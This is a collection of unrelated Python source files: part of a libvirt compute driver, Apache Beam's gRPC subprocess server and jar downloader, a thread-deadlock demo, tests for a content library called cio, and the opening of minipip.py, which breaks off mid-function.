LOG.error(_('Failed to cleanup directory %(target)s: '
'%(e)s'), {'target': target, 'e': e},
instance=instance)
# It is possible that the delete failed, if so don't mark the instance
# as cleaned.
if os.path.exists(target):
LOG.info(_('Deletion of %s failed'), target, instance=instance)
return False
LOG.info(_('Deletion of %s complete'), target, instance=instance)
return True
@property
def need_legacy_block_device_info(self):
return False
def default_root_device_name(self, instance, image_meta, root_bdm):
disk_bus = blockinfo.get_disk_bus_for_device_type(CONF.libvirt_type,
image_meta,
"disk")
cdrom_bus = blockinfo.get_disk_bus_for_device_type(CONF.libvirt_type,
image_meta,
"cdrom")
root_info = blockinfo.get_root_info(CONF.libvirt_type,
image_meta, root_bdm,
disk_bus, cdrom_bus)
return block_device.prepend_dev(root_info['dev'])
def default_device_names_for_instance(self, instance, root_device_name,
*block_device_lists):
ephemerals, swap, block_device_mapping = block_device_lists[:3]
def _update_func(bdm):
bdm_id = bdm.get('id')
self.virtapi.block_device_mapping_update(
nova_context.get_admin_context(),
bdm_id, bdm)
blockinfo.default_device_names(CONF.libvirt_type,
instance, root_device_name,
_update_func,
ephemerals, swap,
block_device_mapping)
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
if refresh or not self._stats:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = (self.driver.
get_disk_over_committed_size_total())
# Disk available least size
available_least = disk_free_gb * unit.Gi - disk_over_committed
return (available_least / unit.Gi)
LOG.debug(_("Updating host stats"))
disk_info_dict = self.driver.get_local_gb_info()
data = {}
#NOTE(dprince): calling capabilities before getVersion works around
# an initialization issue with some versions of Libvirt (1.0.5.5).
# See: https://bugzilla.redhat.com/show_bug.cgi?id=1000116
# See: https://bugs.launchpad.net/nova/+bug/1215593
data["supported_instances"] = \
self.driver.get_instance_capabilities()
data["vcpus"] = self.driver.get_vcpu_total()
data["memory_mb"] = self.driver.get_memory_mb_total()
data["local_gb"] = disk_info_dict['total']
data["vcpus_used"] = self.driver.get_vcpu_used()
data["memory_mb_used"] = self.driver.get_memory_mb_used()
data["local_gb_used"] = disk_info_dict['used']
data["hypervisor_type"] = self.driver.get_hypervisor_type()
data["hypervisor_version"] = self.driver.get_hypervisor_version()
data["hypervisor_hostname"] = self.driver.get_hypervisor_hostname()
data["cpu_info"] = self.driver.get_cpu_info()
data['disk_available_least'] = _get_disk_available_least()
data['pci_passthrough_devices'] = \
self.driver.get_pci_passthrough_devices()
self._stats = data
return data
|
subprocess_server.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
import contextlib
import glob
import hashlib
import logging
import os
import re
import shutil
import signal
import socket
import subprocess
import tempfile
import threading
import time
import zipfile
from urllib.error import URLError
from urllib.request import urlopen
import grpc
from apache_beam.version import __version__ as beam_version
_LOGGER = logging.getLogger(__name__)
class SubprocessServer(object):
"""An abstract base class for running GRPC Servers as an external process.
This class acts as a context which will start up a server, provides a stub
to connect to it, and then shuts the server down. For example::
with SubprocessServer(GrpcStubClass, [executable, arg, ...]) as stub:
stub.CallService(...)
"""
def __init__(self, stub_class, cmd, port=None):
"""Creates the server object.
:param stub_class: the auto-generated GRPC client stub class used for
connecting to the GRPC service
:param cmd: command (including arguments) for starting up the server,
suitable for passing to `subprocess.POpen`.
:param port: (optional) the port at which the subprocess will serve its
service. If not given, one will be randomly chosen and the special
string "{{PORT}}" will be substituted in the command line arguments
with the chosen port.
"""
self._process_lock = threading.RLock()
self._process = None
self._stub_class = stub_class
self._cmd = [str(arg) for arg in cmd]
self._port = port
def __enter__(self):
return self.start()
def __exit__(self, *unused_args):
self.stop()
def start(self):
try:
endpoint = self.start_process()
wait_secs = .1
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
channel = grpc.insecure_channel(endpoint, options=channel_options)
channel_ready = grpc.channel_ready_future(channel)
while True:
if self._process is not None and self._process.poll() is not None:
_LOGGER.error("Starting job service with %s", self._process.args)
raise RuntimeError(
'Service failed to start up with error %s' % self._process.poll())
try:
channel_ready.result(timeout=wait_secs)
break
except (grpc.FutureTimeoutError, grpc.RpcError):
wait_secs *= 1.2
logging.log(
logging.WARNING if wait_secs > 1 else logging.DEBUG,
'Waiting for grpc channel to be ready at %s.',
endpoint)
return self._stub_class(channel)
except: # pylint: disable=bare-except
_LOGGER.exception("Error bringing up service")
self.stop()
raise
def start_process(self):
with self._process_lock:
if self._process:
self.stop()
if self._port:
port = self._port
cmd = self._cmd
else:
port, = pick_port(None)
cmd = [arg.replace('{{PORT}}', str(port)) for arg in self._cmd]
endpoint = 'localhost:%s' % port
_LOGGER.info("Starting service with %s", str(cmd).replace("',", "'"))
self._process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# Emit the output of this command as info level logging.
def log_stdout():
line = self._process.stdout.readline()
while line:
# Remove newline via rstrip() to not print an empty line
_LOGGER.info(line.rstrip())
line = self._process.stdout.readline()
t = threading.Thread(target=log_stdout)
t.daemon = True
t.start()
return endpoint
def stop(self):
self.stop_process()
def stop_process(self):
with self._process_lock:
if not self._process:
return
for _ in range(5):
if self._process.poll() is not None:
break
logging.debug("Sending SIGINT to job_server")
self._process.send_signal(signal.SIGINT)
time.sleep(1)
if self._process.poll() is None:
self._process.kill()
self._process = None
def local_temp_dir(self, **kwargs):
return tempfile.mkdtemp(dir=self._local_temp_root, **kwargs)
class JavaJarServer(SubprocessServer):
APACHE_REPOSITORY = 'https://repo.maven.apache.org/maven2'
BEAM_GROUP_ID = 'org.apache.beam'
JAR_CACHE = os.path.expanduser("~/.apache_beam/cache/jars")
_BEAM_SERVICES = type(
'local', (threading.local, ),
dict(__init__=lambda self: setattr(self, 'replacements', {})))()
def __init__(self, stub_class, path_to_jar, java_arguments, classpath=None):
if classpath:
# java -jar ignores the classpath, so we make a new jar that embeds
# the requested classpath.
path_to_jar = self.make_classpath_jar(path_to_jar, classpath)
super().__init__(
stub_class, ['java', '-jar', path_to_jar] + list(java_arguments))
self._existing_service = path_to_jar if _is_service_endpoint(
path_to_jar) else None
def start_process(self):
if self._existing_service:
return self._existing_service
else:
if not shutil.which('java'):
raise RuntimeError(
'Java must be installed on this system to use this '
'transform/runner.')
return super().start_process()
def stop_process(self):
if self._existing_service:
pass
else:
return super().stop_process()
@classmethod
def jar_name(cls, artifact_id, version, classifier=None, appendix=None):
return '-'.join(
filter(None, [artifact_id, appendix, version, classifier])) + '.jar'
@classmethod
def path_to_maven_jar(
cls,
artifact_id,
group_id,
version,
repository=APACHE_REPOSITORY,
classifier=None,
appendix=None):
return '/'.join([
repository,
group_id.replace('.', '/'),
artifact_id,
version,
cls.jar_name(artifact_id, version, classifier, appendix)
])
@classmethod
def path_to_beam_jar(
cls,
gradle_target,
appendix=None,
version=beam_version,
artifact_id=None):
if gradle_target in cls._BEAM_SERVICES.replacements:
return cls._BEAM_SERVICES.replacements[gradle_target]
gradle_package = gradle_target.strip(':').rsplit(':', 1)[0]
if not artifact_id:
artifact_id = 'beam-' + gradle_package.replace(':', '-')
project_root = os.path.sep.join(
os.path.abspath(__file__).split(os.path.sep)[:-5])
local_path = os.path.join(
project_root,
gradle_package.replace(':', os.path.sep),
'build',
'libs',
cls.jar_name(
artifact_id,
version.replace('.dev', ''),
classifier='SNAPSHOT',
appendix=appendix))
if os.path.exists(local_path):
_LOGGER.info('Using pre-built snapshot at %s', local_path)
return local_path
elif '.dev' in version:
# TODO: Attempt to use nightly snapshots?
raise RuntimeError(
(
'%s not found. '
'Please build the server with \n cd %s; ./gradlew %s') %
(local_path, os.path.abspath(project_root), gradle_target))
else:
return cls.path_to_maven_jar(
artifact_id,
cls.BEAM_GROUP_ID,
version,
cls.APACHE_REPOSITORY,
appendix=appendix)
@classmethod
def local_jar(cls, url, cache_dir=None):
if cache_dir is None:
cache_dir = cls.JAR_CACHE
# TODO: Verify checksum?
if _is_service_endpoint(url):
return url
elif os.path.exists(url):
return url
else:
cached_jar = os.path.join(cache_dir, os.path.basename(url))
if os.path.exists(cached_jar):
_LOGGER.info('Using cached job server jar from %s' % url)
else:
_LOGGER.info('Downloading job server jar from %s' % url)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# TODO: Clean up this cache according to some policy.
try:
url_read = urlopen(url)
with open(cached_jar + '.tmp', 'wb') as jar_write:
shutil.copyfileobj(url_read, jar_write, length=1 << 20)
os.rename(cached_jar + '.tmp', cached_jar)
except URLError as e:
raise RuntimeError(
'Unable to fetch remote job server jar at %s: %s' % (url, e))
return cached_jar
@classmethod
@contextlib.contextmanager
def beam_services(cls, replacements):
try:
old = cls._BEAM_SERVICES.replacements
cls._BEAM_SERVICES.replacements = dict(old, **replacements)
yield
finally:
cls._BEAM_SERVICES.replacements = old
@classmethod
def make_classpath_jar(cls, main_jar, extra_jars, cache_dir=None):
if cache_dir is None:
cache_dir = cls.JAR_CACHE
composite_jar_dir = os.path.join(cache_dir, 'composite-jars')
os.makedirs(composite_jar_dir, exist_ok=True)
classpath = []
# Class-Path references from a jar must be relative, so we create
# a relatively-addressable subdirectory with symlinks to all the
# required jars.
for pattern in [main_jar] + list(extra_jars):
for path in glob.glob(pattern) or [pattern]:
path = os.path.abspath(path)
rel_path = hashlib.sha256(
path.encode('utf-8')).hexdigest() + os.path.splitext(path)[1]
classpath.append(rel_path)
if not os.path.lexists(os.path.join(composite_jar_dir, rel_path)):
os.symlink(path, os.path.join(composite_jar_dir, rel_path))
# Now create a single jar that simply references the rest and has the same
# main class as main_jar.
composite_jar = os.path.join(
composite_jar_dir,
hashlib.sha256(' '.join(sorted(classpath)).encode('ascii')).hexdigest()
+ '.jar')
if not os.path.exists(composite_jar):
with zipfile.ZipFile(main_jar) as main:
with main.open('META-INF/MANIFEST.MF') as manifest:
main_class = next(
filter(lambda line: line.startswith(b'Main-Class: '), manifest))
with zipfile.ZipFile(composite_jar + '.tmp', 'w') as composite:
with composite.open('META-INF/MANIFEST.MF', 'w') as manifest:
manifest.write(b'Manifest-Version: 1.0\n')
manifest.write(main_class)
manifest.write(
b'Class-Path: ' + ' '.join(classpath).encode('ascii') + b'\n')
os.rename(composite_jar + '.tmp', composite_jar)
return composite_jar
def _is_service_endpoint(path):
return re.match(r'^[a-zA-Z0-9.-]+:\d+$', path)
def pick_port(*ports):
"""
Returns a list of ports, same length as input ports list, but replaces
all None or 0 ports with a random free port.
"""
sockets = []
def find_free_port(port):
if port:
return port
else:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except OSError as e:
# [Errno 97] Address family not supported by protocol
# Likely indicates we are in an IPv6-only environment (BEAM-10618). Try
# again with AF_INET6.
if e.errno == 97:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
raise e
sockets.append(s)
s.bind(('localhost', 0))
return s.getsockname()[1]
ports = list(map(find_free_port, ports))
# Close sockets only now to avoid the same port to be chosen twice
for s in sockets:
s.close()
return ports
|
sample_deadlock.py
|
import time
import threading
lock_a = threading.Lock()
lock_b = threading.Lock()
def task1():
print('Task 1 is starting...')
print('Task 1 is waiting to acquire Lock A')
with lock_a:
print('Task 1 has acquired Lock A')
print('Task 1 is doing some calculations')
time.sleep(2)
print('Task 1 is waiting to acquire Lock B')
with lock_b:
print('Task 1 has acquired Lock B')
print('Task 1 is doing some calculations')
time.sleep(2)
print('Task 1 is releasing both locks')
def task2():
print('Task 2 is starting...')
print('Task 2 is waiting to acquire Lock B')
with lock_b:
print('Task 2 has acquired Lock B')
print('Task 2 is doing some calculations')
time.sleep(5)
print('Task 2 is waiting to acquire Lock A')
with lock_a:
print('Task 2 has acquired Lock A')
print('Task 2 is doing some calculations')
time.sleep(5)
print('Task 2 is releasing both locks')
if __name__ == '__main__':
t1 = threading.Thread(target=task1)
t2 = threading.Thread(target=task2)
t1.start()
t2.start()
t1.join()
t2.join()
|
test_api.py
|
import cio
import six
import threading
from cio.backends import cache
from cio.conf import settings
from cio.conf.exceptions import ImproperlyConfigured
from cio.pipeline import pipeline
from cio.backends import storage
from cio.backends.exceptions import NodeDoesNotExist
from cio.utils.uri import URI
from tests import BaseTest
class ApiTest(BaseTest):
def setUp(self):
super(ApiTest, self).setUp()
from cio.conf import settings
settings.configure(
PLUGINS=[
'cio.plugins.txt.TextPlugin',
'cio.plugins.md.MarkdownPlugin',
'tests.UppercasePlugin'
]
)
def test_get(self):
node = cio.get('label/email', default=u'fallback')
self.assertEqual(node.content, u'fallback')
self.assertEqual(node.initial_uri, 'label/email')
self.assertEqual(node.uri, 'i18n://sv-se@label/email.txt')
def test_get_with_empty_default(self):
node = cio.get('page/title', default=u'', lazy=False)
self.assertEqual(node.content, u'')
node = cio.get('page/body', default=None, lazy=False)
self.assertIsNone(node.content)
# Testing same non existing uri's twice to assert cache handles None/"" default
node = cio.get('page/title', default=u'', lazy=False)
self.assertEqual(node.content, u'')
node = cio.get('page/body', default=None, lazy=False)
self.assertIsNone(node.content)
def test_get_with_context(self):
node = cio.get('page/title', default=u'{Welcome} {firstname} {lastname}!')
content = node.render(firstname=u'Jonas', lastname=u'Lundberg')
self.assertEqual(content, u'{Welcome} Jonas Lundberg!')
def test_get_with_local_cache_pipe_settings(self):
def assert_local_thread():
settings.configure(local=True, CACHE={'PIPE': {'CACHE_ON_GET': False}})
self.assertIn('BACKEND', settings.CACHE, 'Cache settings should be merged')
# Test twice so that not the first get() caches the reponse in pipeline
with self.assertCache(calls=1, misses=1, hits=0, sets=0):
cio.get('local/settings', default=u'default', lazy=False)
with self.assertCache(calls=1, misses=1, hits=0, sets=0):
cio.get('local/settings', default=u'default', lazy=False)
thread = threading.Thread(target=assert_local_thread)
thread.start()
thread.join()
# Back on main thread, settings should not be affected
# Test twice to make sure first get chaches the reponse in pipeline
with self.assertCache(calls=2, misses=1, hits=0, sets=1):
cio.get('local/settings', default=u'default', lazy=False)
with self.assertCache(calls=1, misses=0, hits=1, sets=0):
cio.get('local/settings', default=u'default', lazy=False)
def test_set(self):
with self.assertRaises(URI.Invalid):
cio.set('page/title', 'fail')
with self.assertRaises(URI.Invalid):
cio.set('page/title.txt', 'fail')
node = cio.set('i18n://sv-se@label/email.up', u'e-post')
self.assertEqual(node.uri, 'i18n://sv-se@label/email.up#1')
cache.clear()
node = cio.get('label/email', u'fallback')
self.assertEqual(node.content, u'E-POST')
self.assertEqual(node.uri, 'i18n://sv-se@label/email.up#1')
self.assertEqual(node.initial, u'fallback')
self.assertEqual(len(node.meta.keys()), 0) # No meta returned from non-versioned api get
self.assertEqual(repr(node._node), '<Node: i18n://sv-se@label/email.up#1>')
self.assertEqual(node.for_json(), {
'uri': node.uri,
'content': node.content,
'meta': node.meta
})
node = cio.set('sv-se@label/email', u'e-post', publish=False)
self.assertEqual(node.uri, 'i18n://sv-se@label/email.txt#draft')
self.assertKeys(node.meta, 'modified_at', 'is_published')
node = cio.publish(node.uri)
self.assertKeys(node.meta, 'modified_at', 'published_at', 'is_published')
self.assertTrue(node.meta['is_published'])
node = cio.get('label/email')
self.assertEqual(node.uri, 'i18n://sv-se@label/email.txt#2')
self.assertEqual(node.content, u'e-post')
self.assertEqual(node.uri.ext, 'txt')
self.assertEqual(len(node.meta.keys()), 0)
# Try publish non-existing node/uri
node = cio.publish('i18n://sv-se@foo/bar.txt#draft')
self.assertIsNone(node)
def test_delete(self):
with self.assertRaises(URI.Invalid):
cio.delete('foo/bar')
node = cio.set('i18n://sv-se@label/email.txt', u'e-post')
uri = node.uri
self.assertEqual(cache.get(uri)['content'], u'e-post')
uris = cio.delete('sv-se@label/email#1', 'sv-se@foo/bar')
self.assertListEqual(uris, ['sv-se@label/email#1'])
with self.assertRaises(NodeDoesNotExist):
storage.get(uri)
self.assertIsNone(cache.get(uri))
def test_revisions(self):
def assertRevisions(*revs):
revisions = set(cio.revisions('i18n://sv-se@page/title'))
assert revisions == set(revs)
self.assertEqual(len(set(cio.revisions('i18n://sv-se@page/title'))), 0)
node = cio.load('sv-se@page/title')
self.assertDictEqual(node, {
'uri': 'i18n://sv-se@page/title.txt',
'data': None,
'content': None,
'meta': {}
})
# First draft
with self.assertDB(selects=1, inserts=1, updates=0):
with self.assertCache(calls=0):
node = cio.set('i18n://sv-se@page/title.txt', u'Content-IO', publish=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt#draft')
assertRevisions(('i18n://sv-se@page/title.txt#draft', False))
self.assertIsNone(cio.get('page/title').content)
# Publish first draft, version 1
with self.assertDB(calls=4, selects=2, updates=2):
with self.assertCache(calls=1, sets=1):
node = cio.publish(node.uri)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt#1')
assertRevisions(('i18n://sv-se@page/title.txt#1', True))
self.assertEqual(cio.get('page/title').content, u'Content-IO')
# Second draft
with self.assertDB(selects=1, inserts=1, updates=0):
with self.assertCache(calls=0):
node = cio.set('i18n://sv-se@page/title.up', u'Content-IO - Fast!', publish=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up#draft')
assertRevisions(('i18n://sv-se@page/title.txt#1', True), ('i18n://sv-se@page/title.up#draft', False))
self.assertEqual(cio.get('page/title').content, u'Content-IO')
# Publish second draft, version 2
with self.assertDB(calls=4, selects=2, updates=2):
with self.assertCache(calls=1, sets=1):
node = cio.publish(node.uri)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up#2')
assertRevisions(('i18n://sv-se@page/title.txt#1', False), ('i18n://sv-se@page/title.up#2', True))
self.assertEqual(cio.get('page/title').content, u'CONTENT-IO - FAST!')
# Alter published version 2
with self.assertDB(calls=2, selects=1, inserts=0, updates=1):
with self.assertCache(calls=0):
node = cio.set('i18n://sv-se@page/title.up#2', u'Content-IO - Lightening fast!', publish=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up#2')
assertRevisions(('i18n://sv-se@page/title.txt#1', False), ('i18n://sv-se@page/title.up#2', True))
self.assertEqual(cio.get('page/title').content, u'CONTENT-IO - FAST!') # Not published, still in cache
# Re-publish version 2, no change
with self.assertDB(selects=1, inserts=0, updates=0):
with self.assertCache(calls=1, sets=1):
node = cio.publish(node.uri)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up#2')
assertRevisions(('i18n://sv-se@page/title.txt#1', False), ('i18n://sv-se@page/title.up#2', True))
self.assertEqual(cio.get('page/title').content, u'CONTENT-IO - LIGHTENING FAST!')
# Rollback version 1
with self.assertDB(calls=3, selects=1, updates=2):
with self.assertCache(calls=1, sets=1):
node = cio.publish('i18n://sv-se@page/title#1')
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt#1')
assertRevisions(('i18n://sv-se@page/title.txt#1', True), ('i18n://sv-se@page/title.up#2', False))
self.assertEqual(cio.get('page/title').content, u'Content-IO')
# Assert get specific version doesn't mess up the cache
cache.clear()
with self.assertCache(calls=0):
self.assertEqual(cio.get('page/title#2').content, u'CONTENT-IO - LIGHTENING FAST!')
with self.assertCache(calls=2, misses=1, sets=1):
self.assertEqual(cio.get('page/title').content, u'Content-IO')
# Load version 1 and 2
data = cio.load('sv-se@page/title#1')
self.assertEqual(data['uri'], 'i18n://sv-se@page/title.txt#1')
self.assertEqual(data['data'], u'Content-IO')
data = cio.load('sv-se@page/title#2')
self.assertEqual(data['uri'], 'i18n://sv-se@page/title.up#2')
self.assertEqual(data['data'], {u'name': u'Content-IO - Lightening fast!'})
# Load without version and expect published version
data = cio.load('sv-se@page/title')
self.assertEqual(data['uri'], 'i18n://sv-se@page/title.txt#1')
self.assertEqual(data['data'], u'Content-IO')
def test_search(self):
cio.set('i18n://sv-se@label/email.txt', u'e-post')
uris = cio.search()
self.assertEqual(len(uris), 1)
uris = cio.search('foo/')
self.assertEqual(len(uris), 0)
uris = cio.search('label/')
self.assertEqual(len(uris), 1)
def test_environment_state(self):
with cio.env(i18n='en-us'):
node = cio.get('page/title')
self.assertEqual(node.uri, 'i18n://en-us@page/title.txt')
node = cio.get('page/title')
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt')
def test_non_distinct_uri(self):
node1 = cio.get('page/title', u'Title1')
node2 = cio.get('page/title', u'Title2')
self.assertEqual(six.text_type(node1), u'Title1')
self.assertEqual(six.text_type(node2), u'Title1')
node1 = cio.get('page/title', u'Title1', lazy=False)
cache.clear()
node2 = cio.get('page/title', u'Title2', lazy=False)
self.assertEqual(six.text_type(node1), u'Title1')
self.assertEqual(six.text_type(node2), u'Title2') # Second node not buffered, therefore unique default content
def test_fallback(self):
with cio.env(i18n=('sv-se', 'en-us', 'en-uk')):
cio.set('i18n://bogus@label/email.txt', u'epost')
cio.set('i18n://en-uk@label/surname.txt', u'surname')
with self.assertCache(misses=2, sets=2):
with self.assertDB(calls=6, selects=6):
node1 = cio.get('i18n://label/email')
node2 = cio.get('i18n://label/surname', u'efternamn')
self.assertEqual(node1.uri.namespace, 'sv-se') # No fallback, stuck on first namespace, sv-se
self.assertEqual(node1.namespace_uri.namespace, 'sv-se')
self.assertIsNone(node1.content)
self.assertEqual(node2.uri.namespace, 'en-uk')
self.assertEqual(node2.namespace_uri.namespace, 'sv-se')
self.assertEqual(node2.content, u'surname')
cache.clear()
with self.assertCache(misses=2, sets=2):
with self.assertDB(calls=6):
cio.get('i18n://label/email', lazy=False)
cio.get('i18n://label/surname', u'lastname', lazy=False)
def test_uri_redirect(self):
cio.set('i18n://sv-se@page/title.txt', u'Title')
node = cio.get('i18n://sv-se@page/title', u'Default')
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt#1')
self.assertEqual(node.content, u'Title')
node = cio.get('i18n://sv-se@page/title.up', u'Default Upper', lazy=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up')
self.assertEqual(node.content, u'DEFAULT UPPER') # Cache still contains 'Title', but plugin diff and skipped
cached_node = cache.get(node.uri)
self.assertDictEqual(cached_node, {'uri': node.uri, 'content': u'DEFAULT UPPER'})
cache.clear()
node = cio.get('i18n://sv-se@page/title.up', u'Default-Upper', lazy=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up')
self.assertEqual(node.content, u'DEFAULT-UPPER') # Cache cleared, storage plugin mismatch, default fallback
def test_node_meta(self):
node = cio.set('sv-se@page/title', u'', author=u'lundberg')
self.assertEqual(node.meta.get('author'), u'lundberg')
node = cio.get('page/title')
self.assertEqual(len(node.meta.keys()), 0) # Cached node has no meta
node = cio.load('sv-se@page/title#1')
meta = node['meta']
self.assertKeys(meta, 'author', 'modified_at', 'published_at', 'is_published')
self.assertEqual(meta.get('author'), u'lundberg')
cio.set('sv-se@page/title#1', u'', comment=u'This works!')
node = cio.load('sv-se@page/title#1')
meta = node['meta']
self.assertKeys(meta, 'author', 'comment', 'modified_at', 'published_at', 'is_published')
self.assertEqual(meta.get('author'), u'lundberg')
self.assertEqual(meta.get('comment'), u'This works!')
cio.set('sv-se@page/title#1', u'', comment=None)
node = cio.load('sv-se@page/title#1')
meta = node['meta']
self.assertKeys(meta, 'author', 'modified_at', 'published_at', 'is_published')
self.assertEqual(meta.get('author'), u'lundberg')
self.assertNotIn('comment', meta)
def test_pipes_hits(self):
with cio.env(i18n=('sv-se', 'en-us')):
with self.assertDB(inserts=2):
with self.assertCache(calls=2, sets=2):
cio.set('i18n://sv-se@label/email.txt', u'epost')
cio.set('i18n://en-us@label/surname.txt', u'surname')
# Lazy gets
with self.assertDB(calls=0):
with self.assertCache(calls=0):
node1 = cio.get('label/email')
node2 = cio.get('i18n://label/surname')
node3 = cio.get('i18n://monkey@label/zipcode', default=u'postnummer')
# with self.assertDB(calls=2), self.assertCache(calls=5, hits=1, misses=2, sets=2):
with self.assertDB(calls=4, selects=4):
with self.assertCache(calls=2, hits=1, misses=2, sets=2):
self.assertEqual(six.text_type(node1), u'epost')
self.assertEqual(node2.content, u'surname')
self.assertEqual(six.text_type(node3), u'postnummer')
with self.assertDB(calls=0):
with self.assertCache(calls=1, hits=3):
node1 = cio.get('label/email')
node2 = cio.get('i18n://label/surname')
node3 = cio.get('i18n://monkey@label/zipcode', default=u'postnummer')
self.assertEqual(six.text_type(node1), u'epost')
self.assertEqual(node2.content, u'surname')
self.assertEqual(six.text_type(node3), u'postnummer')
self.assertIsNotNone(repr(node1))
self.assertIsNotNone(str(node1))
def test_forced_empty_content(self):
with self.assertRaises(ValueError):
cio.set('i18n://sv-se@none', None)
node = cio.set('i18n://sv-se@empty.txt', u'')
node = cio.get(node.uri, default=u'fallback')
self.assertEqual(six.text_type(node), u'')
def test_load_pipeline(self):
with self.assertRaises(ImportError):
pipeline.add_pipe('foo.Bar')
def test_unknown_plugin(self):
with self.assertRaises(ImproperlyConfigured):
cio.set('i18n://sv-se@foo/bar.baz#draft', 'raise')
def test_abandoned_buffered_node(self):
cio.set('sv-se@foo/bar', u'foobar')
node = cio.get('foo/bar')
self.assertFalse(node._flushed)
self.assertIn('get', pipeline._buffer._buffer)
# Mess things up...
pipeline.clear()
self.assertFalse(node._flushed)
self.assertNotIn('get', pipeline._buffer._buffer)
self.assertEqual(node.content, u'foobar')
self.assertTrue(node._flushed)
|
minipip.py
|
#!/usr/bin/env python3
"""
MIT License
Copyright (c) 2021 Aivar Annamaa
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import io
import json
import os.path
import sys
import shlex
import shutil
import subprocess
import tarfile
import tempfile
import textwrap
import threading
from html.parser import HTMLParser
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import BaseRequestHandler, BaseServer
from typing import Union, List, Dict, Any, Optional, Tuple, Callable
from urllib.error import HTTPError
from urllib.request import urlopen
import pkg_resources
import logging
import typing
try:
from shlex import join as shlex_join
except ImportError:
# before Python 3.8
def shlex_join(split_command):
"""Return a shell-escaped string from *split_command*."""
return " ".join(shlex.quote(arg) for arg in split_command)
from pkg_resources import Requirement
logger = logging.getLogger(__name__)
MP_ORG_INDEX = "https://micropython.org/pi"
PYPI_INDEX = "https://pypi.org/pypi"
PYPI_SIMPLE_INDEX = "https://pypi.org/simple"
DEFAULT_INDEX_URLS = [MP_ORG_INDEX, PYPI_INDEX]
SERVER_ENCODING = "utf-8"
__version__ = "0.1b5"
class FileUrlsParser(HTMLParser):
def error(self, message):
pass
def __init__(self):
self._current_tag: str = ""
self._current_attrs: List[Tuple[str, str]] = []
self.file_urls: Dict[str, str] = {}
super().__init__()
def handle_starttag(self, tag: str, attrs: List[Tuple[str, str]]) -> None:
self._current_tag = tag
self._current_attrs = attrs
def handle_data(self, data: str) -> None:
if self._current_tag == "a":
for att, val in self._current_attrs:
if att == "href":
self.file_urls[data] = val
def handle_endtag(self, tag):
pass
class Downloader:
def __init__(self, index_url: str):
self._index_url = index_url.rstrip("/")
self._file_urls_cache: Dict[str, Dict[str, str]] = {}
def get_file_urls(self, dist_name: str) -> Dict[str, str]:
if dist_name not in self._file_urls_cache:
self._file_urls_cache[dist_name] = self._download_file_urls(dist_name)
return self._file_urls_cache[dist_name]
def _download_file_urls(self, dist_name) -> Dict[str, str]:
url = f"{self._index_url}/{dist_name}"
logger.debug("Downloading %s", url)
with urlopen(url) as fp:
parser = FileUrlsParser()
parser.feed(fp.read().decode("utf-8"))
return parser.file_urls
def download_file(self, dist_name: str, file_name: str) -> typing.BinaryIO:
urls = self.get_file_urls(dist_name)
assert file_name in urls
result = urlopen(urls[file_name])
logger.debug("Headers: %r", result.headers.items())
return result
class MinipipServer(HTTPServer):
def __init__(
self,
server_address: Tuple[str, int],
request_handler_class: Callable[..., BaseRequestHandler],
):
self.downloader = Downloader(PYPI_SIMPLE_INDEX)
super().__init__(server_address, request_handler_class)
_server: Optional[MinipipServer] = None
def close_server():
global _server
if _server is not None:
_server.shutdown()
_server = None
class MinipipProxyHandler(BaseHTTPRequestHandler):
def __init__(self, request: bytes, client_address: Tuple[str, int], server: BaseServer):
print("CREATING NEW HANDLER")
assert isinstance(server, MinipipServer)
self._downloader = server.downloader
super(MinipipProxyHandler, self).__init__(request, client_address, server)
def do_GET(self) -> None:
path = self.path.strip("/")
logger.debug("do_GET for %s", path)
